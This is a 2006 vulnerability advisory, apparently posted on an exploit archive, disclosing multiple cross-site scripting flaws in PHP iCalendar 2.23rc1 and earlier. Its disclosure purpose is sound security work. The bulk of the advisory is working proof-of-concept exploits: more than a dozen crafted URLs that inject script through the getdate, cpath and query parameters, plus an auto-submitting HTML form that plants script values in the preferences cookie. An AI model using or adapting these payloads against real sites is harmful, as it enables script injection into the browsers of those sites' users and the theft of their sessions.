phpicalendar-xss.txt

phpicalendar-xss.txt: Posted Dec 28, 2006; Authored by Lostmon | Site lostmon.blogspot.com; PHP icalendar versions 2.23rc1 and below are susceptible to multiple cross site scripting vulnerabilities.; tags | exploit, php, vulnerability, xss; MD5 | 2ed45962cad1d5d30334480bf58c9883; Download | Favorite | Comments (0)

phpicalendar-xss.txt

#####################################################
PHP icalendar multiple variable cross site scripting
Vendor url:http://phpicalendar.net/
Advisore:http://lostmon.blogspot.com/2006/12/
php-icalendar-multiple-variable-cross.html
Vendor notify: YES Exploit included:YES
#####################################################


PHP icalendar contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate multiple params upon submission to multiple scripts.
This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server, leading
to a loss of integrity.

######################
versions
######################

all of this versions have been tested
Posible other versions are prone vulnerables.

PHP iCalendar 2.23 rc1
PHP iCalendar 2.22
PHP icalendar 2.0 Beta
PHP iCalendar 1.1

######################
Solution:
######################

No solution was available at this time!!

##################
Time Line
##################

Discovered:20-12-2006
Vendor notify:25-12-2006
Vendor response:
Disclosure:27-12-2006

###################
EXAMPLES & PoC
###################

http://localhost/phpicalendar/day.php?cal=all_calendars_combined971
&getdate=20061225"><script>alert()</script>

http://localhost/phpicalendar/month.php?cal=all_calendars_combined971
&getdate=20061225"><script>alert()</script>

http://localhost/phpicalendar/year.php?cal=all_calendars_combined971
&getdate=20061225"><script>alert()</script>

http://localhost/phpicalendar/week.php?cal=all_calendars_combined971
&getdate=20061225"><script>alert()</script>

http://localhost/phpicalendar/day.php?cpath=%22%3E%3Cscript%3Edocument.write(document.domain)%3C/script%3E
&getdate=20061225&cal%5B%5D=Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work


http://localhost/phpicalendar/month.php?cpath=%22%3E%3Cscript%3Edocument.write(document.domain)%3C/script%3E
&getdate=20061225&cal%5B%5D=Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work


http://localhost/phpicalendar/year.php?cpath=%22%3E%3Cscript%3Edocument.write(document.domain)%3C/script%3E
&getdate=20061225&cal%5B%5D=Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work


http://localhost/phpicalendar/week.php?cpath=%22%3E%3Cscript%3Edocument.write(document.domain)%3C/script%3E
&getdate=20061225&cal%5B%5D=Home&cal%5B%5D=US%2BHolidays&cal%5B%5D=Work


----


http://localhost/phpicalendar/search.php?cpath=&cal=Home%2CUS%2BHolidays%2CWork
&getdate=19700102&query=ss"><script>alert()</script>&submit.x=11&submit.y=15


http://localhost/phpicalendar/search.php?cpath="><script>alert()</script>&cal=Home
%2CUS%2BHolidays%2CWork&getdate=19700102&query=ss&submit.x=11&submit.y=12


http://localhost/phpicalendar/search.php?cpath=&cal=Home%2CUS%2BHolidays%2CWork
&getdate=19700102"><script>alert()</script>&query=ss&submit.x=11&submit.y=12

----

http://localhost/phpicalendar/rss/index.php?cal=Home,US+Holidays,Work
&getdate=20061225"><script>alert()</script>

http://localhost/phpicalendar/print.php?cal=Home,US+Holidays,Work
&getdate=20061225%22%3E%3Cscript%3Ealert()%3C/script%3E&printview=day

################################
Proof of concept for preferences
################################

Multiple param XSS in preferences.php

Use the proof and modify some params
create a evil cookie before submit :)

http://localhost/phpicalendar/preferences.php?cal=Home,US+Holidays,Work
&getdate=20061227%22%3E%3Cscript%3Ealert()%3C/script%3E


<html>
<head></head>
<body>
<title>PHP icalendar XSS in preferences.php PoC</title>
<p><a href="http://phpicalendar.net/" target="_BLANK">PHP
icalendar</a> <= 2.23 rc1 preferences.php XSS Proof Of concept By <a
href="http://Lostmon.blogspot.com" target="_BLANK">Lostmon</a></p>
<p>Modify the target host , by default http://localhost/</P>
<br /><br /><form method='post'
action='http://localhost/phpicalendar/preferences.php?action=setcookie'>
cookie_language: <input input='text' value='Spanish'
name='cookie_language' style='width: 80%' /><br>
cookie_calendar: <input input='text'
value='all_calendars_combined971' name='cookie_calendar' style='width:
80%' /><br>
cpath: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='cpath' style='width: 80%' /><br>
cookie_view: <input input='text' value='day' name='cookie_view'
style='width: 80%' /><br>
cookie_time: <input input='text' value='0700' name='cookie_time'
style='width: 80%' /><br>
cookie_startday: <input input='text' value='Sunday'
name='cookie_startday' style='width: 80%' /><br>
cookie_style: <input input='text' value='default' name='cookie_style'
style='width: 80%' /><br>
unset: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='unset' style='width: 80%' /><br>
set: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='set' style='width: 80%' /><br>
<input type='submit' value='submit' /><br>
</form><hr />
<textarea style='width: 80%; height: 50%;'>
<form method='post'
action='http://localhost/phpicalendar/preferences.php?action=setcookie'>
cookie_language: <input input='text' value='Spanish'
name='cookie_language' style='width: 80%' /><br>
cookie_calendar: <input input='text'
value='all_calendars_combined971' name='cookie_calendar' style='width:
80%' /><br>
cpath: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='cpath' style='width: 80%' /><br>

cookie_view: <input input='text' value='day' name='cookie_view'
style='width: 80%' /><br>
cookie_time: <input input='text' value='0700' name='cookie_time'
style='width: 80%' /><br>
cookie_startday: <input input='text' value='Sunday'
name='cookie_startday' style='width: 80%' /><br>
cookie_style: <input input='text' value='default' name='cookie_style'
style='width: 80%' /><br>
unset: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='unset' style='width: 80%' /><br>
set: <input input='text'
value='<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'
name='set' style='width: 80%' /><br>
<input type='submit' value='submit' /><br>
</form>
<script>
document.forms[0].submit()
</script>
</textarea>
</body>
</html>


######################## €nd #####################

Thnx to Estrella to be my ligth.

-- 
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....

Comments

Subscribe to this comment feed

No comments yet, be the first!

Top Authors In Last 30 Days

Heine Pedersen 29 files
Torben Jensen 29 files
Farbod Mahini 26 files
Ubuntu 26 files
Red Hat 25 files
Debian 24 files
Mandriva 17 files
sinn3r 11 files
the_cyber_nuxbie 10 files
Am!r 9 files

File Archives

Systems

AIX (352)
Apple (963)
BSD (302)
Cisco (1,247)
Debian (3,802)
Fedora (1,660)
FreeBSD (1,024)
Gentoo (2,468)
HPUX (685)
iPhone (95)
IRIX (217)
Juniper (60)
Linux (20,649)
Mac OS X (415)
Mandriva (2,205)
NetBSD (235)
OpenBSD (414)
RedHat (2,431)
Slackware (378)
Solaris (1,472)
SUSE (1,228)
Ubuntu (2,728)
UNIX (6,852)
UnixWare (148)
Windows (4,019)
Other

phpicalendar-xss.txt

phpicalendar-xss.txt

Comments

File Archive:

May 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems

phpicalendar-xss.txt

Share This

phpicalendar-xss.txt

Comments

File Archive:

May 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems